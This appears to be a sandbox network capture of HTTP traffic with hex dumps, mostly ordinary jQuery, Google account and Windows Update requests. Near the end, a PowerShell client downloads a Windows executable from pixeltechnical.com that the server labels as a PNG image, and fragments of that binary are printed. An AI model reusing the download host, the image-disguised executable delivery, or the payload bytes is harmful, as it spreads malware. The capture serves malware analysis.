2024-01-26 09:16:06 UTC	498	OUT	GET /jquery-3.6.4.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-01-26 09:16:06 UTC	569	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89795 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15ec3" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Fri, 26 Jan 2024 09:16:06 GMT Age: 7529088 X-Served-By: cache-lga21953-LGA, cache-pdk-kfty2130031-PDK X-Cache: HIT, HIT X-Cache-Hits: 4477, 1 X-Timer: S1706260566.282798,VS0,VE2 Vary: Accept-Encoding
2024-01-26 09:16:06 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 34 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.4 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2024-01-26 09:16:06 UTC	16384	IN	Data Raw: 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 73 5d 3b 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 2b 2b 64 26 26 61 3d 3d 3d 65 29 7b 69 5b 68 5d 3d 5b 6b 2c 73 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 Data Ascii: 0]===k&&r[1])&&r[2],a=s&&c.childNodes[s];while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if(1===a.nodeType&&++d&&a===e){i[h]=[k,s,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&
2024-01-26 09:16:06 UTC	16384	IN	Data Raw: 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f 5e 2d 6d 73 2d 2f 2c 7a 3d 2f 2d 28 5b 61 2d 7a 5d 29 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 58 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 5f 2c 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d Data Ascii: .call(e):u?t(e[0],n):o},_=/^-ms-/,z=/-([a-z])/g;function U(e,t){return t.toUpperCase()}function X(e){return e.replace(_,"ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}
2024-01-26 09:16:06 UTC	16384	IN	Data Raw: 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 73 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 3b 69 66 28 74 29 69 66 28 6e 29 66 6f 72 28 6f 3d 6f 7c 7c 79 65 28 65 29 2c 61 3d 61 7c 7c 79 65 28 63 29 2c 72 3d 30 2c 69 3d 6f 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 4c 65 28 6f 5b 72 5d 2c 61 5b 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 79 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 76 65 28 61 2c 21 66 26 26 79 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 Data Ascii: !==l&&"textarea"!==l\|\|(u.defaultValue=s.defaultValue);if(t)if(n)for(o=o\|\|ye(e),a=a\|\|ye(c),r=0,i=o.length;r<i;r++)Le(o[r],a[r]);else Le(e,c);return 0<(a=ye(c,"script")).length&&ve(a,!f&&ye(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.speci
2024-01-26 09:16:06 UTC	16384	IN	Data Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 72 74 2e 74 79 70 65 3d 22 72 61 64 69 6f 22 2c 76 2e 72 61 64 69 6f 56 61 6c 75 65 3d 22 74 22 3d 3d 3d 72 74 2e 76 61 6c 75 65 3b 76 61 72 20 70 74 2c 64 74 3d 53 2e 65 78 70 72 2e 61 74 74 72 48 61 6e 64 6c 65 3b 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 42 28 74 68 69 73 2c 53 2e 61 74 74 72 2c 65 2c 74 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 72 65 6d 6f 76 65 41 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 2e 72 65 6d 6f 76 65 41 74 74 72 28 74 68 69 73 2c 65 Data Ascii: .createElement("input")).value="t",rt.type="radio",v.radioValue="t"===rt.value;var pt,dt=S.expr.attrHandle;S.fn.extend({attr:function(e,t){return B(this,S.attr,e,t,1<arguments.length)},removeAttr:function(e){return this.each(function(){S.removeAttr(this,e
2024-01-26 09:16:06 UTC	7875	IN	Data Raw: 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 43 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 5f 74 3d 7b 30 3a 32 30 30 2c 31 32 32 33 3a 32 30 34 7d 2c 7a 74 3d 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 76 2e 63 6f 72 73 3d 21 21 7a 74 26 26 22 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 22 69 6e 20 7a 74 2c 76 2e 61 6a 61 78 3d 7a 74 3d 21 21 7a 74 2c 53 2e 61 6a 61 78 54 72 61 6e 73 70 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 6f 2c 61 3b 69 66 28 76 2e 63 6f 72 73 7c 7c 7a 74 26 26 21 69 2e 63 72 6f Data Ascii: etClientRects().length)},S.ajaxSettings.xhr=function(){try{return new C.XMLHttpRequest}catch(e){}};var _t={0:200,1223:204},zt=S.ajaxSettings.xhr();v.cors=!!zt&&"withCredentials"in zt,v.ajax=zt=!!zt,S.ajaxTransport(function(i){var o,a;if(v.cors\|\|zt&&!i.cro

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:16:06 UTC	680	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=LtGInZ4I4WDrCvCHQBVMHOy4a-sqzpSrMO-Rwr8ezStTz_kfoi2bri7uGdXfNvskAEO_Tj5Jkwl0XSN-qA6MYiGShcDB_vNQOl1bpl3aua7gMrDRvWsHLpAuFBlBnNxTMeen95XElzx3r4myG8p8sgSHdx4NBawYGaI5oFn_dZ8
2024-01-26 09:16:06 UTC	1	OUT	Data Raw: 20 Data Ascii:
2024-01-26 09:16:06 UTC	1799	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jan 2024 09:16:06 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-L_qtLKGYUTcPUoH6KHc83Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmII1pBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIR6Oax_OrmUTeDHtUD8jALzgF_0" Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-01-26 09:16:06 UTC	23	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2024-01-26 09:16:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:16:13 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9F67e8v43TZg97X&MD=7uCBP+AO HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-01-26 09:16:13 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 20d54d71-bf40-47ca-946d-507123a3265c MS-RequestId: 197104fd-7ea8-4cb2-808c-b2409063036f MS-CV: w9Cr0+Bo50aaLOQr.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Jan 2024 09:16:13 GMT Connection: close Content-Length: 24490
2024-01-26 09:16:13 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-01-26 09:16:13 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:16:50 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9F67e8v43TZg97X&MD=7uCBP+AO HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-01-26 09:16:51 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 73563b80-ec40-4ca9-9b4a-a241fab069b5 MS-RequestId: ceb30e9b-493f-45ab-ab63-fa363ba6ec1c MS-CV: 2HpNvWbTM0WSMsQm.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Jan 2024 09:16:50 GMT Connection: close Content-Length: 25457
2024-01-26 09:16:51 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-01-26 09:16:51 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:11 UTC	173	OUT	GET /V1x/172988 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pixeltechnical.com Connection: Keep-Alive
2024-01-26 09:17:12 UTC	179	IN	HTTP/1.1 200 OK Date: Fri, 26 Jan 2024 09:17:12 GMT Server: Apache/2.4.41 (Ubuntu) Accept-Ranges: bytes Content-Length: 1661216 Connection: close Content-Type: image/png
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 c8 a2 7d 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 7a 0e 00 00 84 0a 00 00 00 00 00 54 a8 0b 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 19 00 00 04 00 00 c0 e1 19 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd}e"zT@`
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff c7 d0 ff ff a1 ca ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff ff 6a d2 ff Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: 01 3b 44 24 54 7d 14 80 f9 0d 75 0f 31 c9 80 3c 07 0a 0f 94 c1 44 0f 44 e8 01 cd 44 89 ac 24 9c 00 00 00 49 63 f5 48 83 7c 24 70 00 48 89 ac 24 a0 00 00 00 0f 84 23 03 00 00 4d 85 ff 74 57 41 80 3c f7 00 4c 8b 6c 24 70 74 63 41 0f b7 44 f7 01 41 0f b6 4c f7 03 c1 e1 10 09 c1 b8 ff ff ff ff 41 80 7c f7 04 00 74 5e 41 0f b7 54 f7 05 45 0f b6 74 f7 07 41 c1 e6 10 41 09 d6 45 8b 6c b5 00 41 bf ff ff ff ff 41 f7 c5 00 00 10 00 74 59 89 cb 89 c5 eb 5f 48 8b 44 24 70 44 8b 2c b0 44 89 e8 25 ff 01 00 00 b9 ff ff ff ff eb 1e 41 8b 44 b5 00 b9 ff 01 00 00 21 c8 b9 ff ff ff ff 41 80 7c f7 04 00 75 a2 45 8b 6c b5 00 45 89 ef 41 c1 ef 09 41 81 e7 ff 01 00 00 41 be ff ff ff ff 41 f7 c5 00 00 10 00 75 a7 44 89 f3 41 89 ce 44 89 fd 41 89 c7 8a 05 75 30 12 00 84 c0 74 25 Data Ascii: ;D$T}u1<DDD$IcH\|$pH$#MtWA<Ll$ptcADALA\|t^ATEtAAElAAtY_HD$pD,D%AD!A\|uElEAAAAuDADAu0t%
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: cf 48 8b 04 c8 48 89 05 b4 f7 11 00 b0 01 48 89 44 24 28 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 89 ff 41 83 c7 01 44 89 ff 8b 44 24 3c 89 fb 39 c7 0f 8d ef 01 00 00 48 8b 4c 24 30 8d 7b 01 39 c7 7d 0c 48 63 c7 48 8b 14 c1 eb 05 0f 1f 00 31 d2 48 63 c3 4c 8b 24 c1 4c 89 e1 41 b8 01 00 00 00 49 89 f1 e8 a6 86 02 00 83 f8 02 74 b1 83 f8 01 74 b6 83 f8 fe 75 17 48 8d 0d 80 78 0f 00 4c 89 e2 e8 f8 a2 ff ff 41 89 df eb 96 0f 1f 00 4c 89 e1 48 8d 15 7e aa 0f 00 e8 11 29 0c 00 85 c0 0f 84 23 02 00 00 4c 89 e1 4c 89 ea e8 fe 28 0c 00 85 c0 0f 84 77 02 00 00 80 3d 5f 26 0e 00 00 74 5c 4c 89 e1 48 8d 15 43 0d 10 00 e8 de 28 0c 00 85 c0 0f 84 e2 01 00 00 4c 89 e1 48 8d 15 2b 0d 10 00 e8 c7 28 0c 00 85 c0 0f 84 cb 01 00 00 4c 89 e1 48 8d 15 0b 0d 10 00 e8 b0 28 0c Data Ascii: HHHD$(f.AADD$<9HL$0{9}HcH1HcL$LAIttuHxLALH~)#LL(w=_&t\LHC(LH+(LH(
2024-01-26 09:17:12 UTC	16384	IN	Data Raw: 00 0f 28 05 18 8a 0d 00 0f 29 44 24 50 0f 28 05 1c 8a 0d 00 0f 29 44 24 30 0f 28 05 20 8a 0d 00 0f 29 44 24 20 66 44 0f 6f 1d 22 8a 0d 00 66 0f 6f 3d 2a 8a 0d 00 66 0f 6f 35 32 8a 0d 00 66 0f 6f 05 3a 8a 0d 00 66 0f 6f 0d 42 8a 0d 00 b8 48 12 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 66 0f 7f 4c 24 40 66 0f 7f 44 24 60 66 0f 7f 74 24 70 66 0f 7f bc 24 80 00 00 00 66 44 0f 7f 9c 24 90 00 00 00 66 0f 6f c1 66 0f ef db 66 0f 68 c3 66 0f 6f c8 66 0f 6f 15 03 8a 0d 00 66 0f d5 ca 66 44 0f 6f 7c 24 40 66 44 0f 60 fb 66 45 0f 6f c7 66 44 0f d5 c2 66 0f 71 d1 08 66 0f 6f 15 fc 89 0d 00 66 0f d5 c2 66 44 0f d5 fa 66 44 0f 6f ea 66 0f 6f 54 24 60 66 44 0f 6f 25 0f 8a 0d 00 66 41 0f ef d4 66 0f 6f 2d 12 8a 0d 00 66 0f 6f dd 66 41 0f 71 d0 08 66 0f 66 da 66 0f 76 Data Ascii: ()D$P()D$0( )D$ fDo"fo=*fo52fo:foBHf.fL$@fD$`ft$pf$fD$foffhfofoffDo\|$@fD`fEofDfqfoffDfDofoT$`fDo%fAfo-fofAqfffv
